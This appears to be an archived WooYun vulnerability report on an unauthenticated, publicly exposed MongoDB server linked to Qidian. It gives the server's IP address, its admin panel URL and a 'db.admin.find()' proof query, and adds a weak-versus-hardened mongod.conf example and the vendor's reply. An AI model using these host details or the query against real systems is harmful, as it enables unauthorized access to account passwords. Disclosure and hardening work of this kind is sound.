Vulnerability summary

Defect ID: wooyun-2013-028524

Title: Qidian (起点中文网) MongoDB misconfiguration leaks account passwords

Affected vendor: Shanda Networks (盛大网络)

Author: P w

Submitted: 2013-07-11 11:17

Fixed: 2013-08-25 11:18

Published: 2013-08-25 11:18

Vulnerability type: Unauthorized access / privilege bypass

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2013-07-11: Details sent to the vendor; awaiting vendor handling
2013-07-11: Vendor confirmed; details visible to the vendor only
2013-07-21: Details disclosed to core white-hats and domain experts
2013-07-31: Details disclosed to regular white-hats
2013-08-10: Details disclosed to intern white-hats
2013-08-25: Details disclosed to the public

Summary:

I got demoted to intern white-hat and can't even view vulnerabilities any more, so I'm quickly submitting one.

Details:

112.90.56.99 (Soldier Admin Manager): the MongoDB instance is exposed to the outside and has no password, so the database can be connected to directly without authentication.
The admin panel is at http://112.90.56.99/index.php/admin/login?error=error%20password%20or%20username
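To illustrate the misconfiguration described above, here is an added example (not part of the original report and not the affected host's actual configuration) showing the weak mongod.conf pattern beside a hardened one; the YAML config format and the bind address are assumptions:

```yaml
# --- Weak configuration (constructed example of the pattern in this report) ---
# mongod listens on every interface and enforces no authentication, so anyone who
# can reach the port can open a shell and read collections such as db.admin.
net:
  bindIp: 0.0.0.0            # reachable from the public Internet
  port: 27017
security:
  authorization: disabled    # no credentials required for any operation

# --- Hardened configuration (assumed YAML form of mongod.conf) ---
# Bind only to loopback (or the application server's private address) and require
# every client to authenticate; put a host firewall in front of the port as well.
net:
  bindIp: 127.0.0.1          # never a public interface
  port: 27017
security:
  authorization: enabled     # all clients must present credentials
```

Create the administrative user in the admin database before switching authorization to enabled, otherwise only the localhost exception remains as a way in.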

Proof:

> db.admin.find()



Remediation:

Copyright: please credit the source when reposting: P w@WooYun (乌云)


Responses

Vendor response:

Severity: Medium

Rank: 7

Confirmed: 2013-07-11 17:47

Vendor reply:

It has been confirmed that the affected system is not maintained by Qidian. The former partner responsible for it has been notified; the partner says it is not a core application and will fix it a little later. Thanks to the white-hat for the report.

Latest status:

None yet